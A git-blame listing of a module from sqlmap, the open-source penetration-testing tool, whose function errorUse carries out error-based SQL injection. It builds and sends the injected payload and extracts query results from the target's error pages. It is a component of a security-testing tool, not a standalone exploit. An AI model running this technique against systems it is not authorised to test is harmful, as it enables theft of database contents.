2010-10-20 13:09:04 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
|
|
|
$Id$
|
|
|
|
|
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
|
|
|
See the file 'doc/COPYING' for copying permission
|
|
|
|
"""
|
|
|
|
|
|
|
|
import re
|
|
|
|
import time
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
|
|
|
from lib.core.common import getUnicode
|
|
|
|
from lib.core.common import randomInt
|
|
|
|
from lib.core.common import replaceNewlineTabs
|
|
|
|
from lib.core.common import safeStringFormat
|
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.data import queries
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2010-10-20 13:09:04 +04:00
|
|
|
from lib.core.session import setError
|
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
|
|
|
|
from lib.core.settings import ERROR_SPACE
|
|
|
|
from lib.core.settings import ERROR_EMPTY_CHAR
|
|
|
|
|
2010-12-01 20:09:52 +03:00
|
|
|
def errorUse(expression):
|
2010-10-20 13:09:04 +04:00
|
|
|
"""
|
|
|
|
Retrieve the output of a SQL query taking advantage of an error SQL
|
|
|
|
injection vulnerability on the affected parameter.
|
|
|
|
"""
|
2010-10-25 18:11:47 +04:00
|
|
|
|
2010-12-01 20:09:52 +03:00
|
|
|
output = None
|
|
|
|
query = agent.cleanupPayload(kb.injection.data[2].epayload)
|
2010-12-01 20:18:31 +03:00
|
|
|
query = unescaper.unescape(query)
|
2010-12-01 20:09:52 +03:00
|
|
|
query = agent.prefixQuery(query)
|
|
|
|
query = agent.suffixQuery(query)
|
|
|
|
check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
|
2010-10-20 13:09:04 +04:00
|
|
|
|
2010-12-01 20:09:52 +03:00
|
|
|
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
|
|
|
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
2010-10-21 02:43:02 +04:00
|
|
|
|
2010-12-01 20:09:52 +03:00
|
|
|
if kb.dbms == DBMS.MYSQL:
|
|
|
|
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
|
2010-10-21 02:43:02 +04:00
|
|
|
|
2010-12-01 20:09:52 +03:00
|
|
|
expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
|
|
|
expression = unescaper.unescape(expression)
|
2010-12-01 20:18:31 +03:00
|
|
|
expression = safeStringFormat(query, expression)
|
2010-10-20 13:09:04 +04:00
|
|
|
|
2010-12-01 20:09:52 +03:00
|
|
|
debugMsg = "query: %s" % expression
|
2010-11-08 01:34:29 +03:00
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
2010-12-01 20:09:52 +03:00
|
|
|
payload = agent.payload(newValue=expression)
|
|
|
|
reqBody, _ = Request.queryPage(payload, content=True)
|
|
|
|
match = re.search(check, reqBody, re.DOTALL | re.IGNORECASE)
|
2010-10-26 13:33:18 +04:00
|
|
|
|
2010-10-20 13:09:04 +04:00
|
|
|
if match:
|
|
|
|
output = match.group('result')
|
2010-11-08 19:46:25 +03:00
|
|
|
|
2010-10-20 13:09:04 +04:00
|
|
|
if output:
|
|
|
|
output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "")
|
|
|
|
|
|
|
|
if conf.verbose > 0:
|
|
|
|
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-12-01 20:09:52 +03:00
|
|
|
return output
|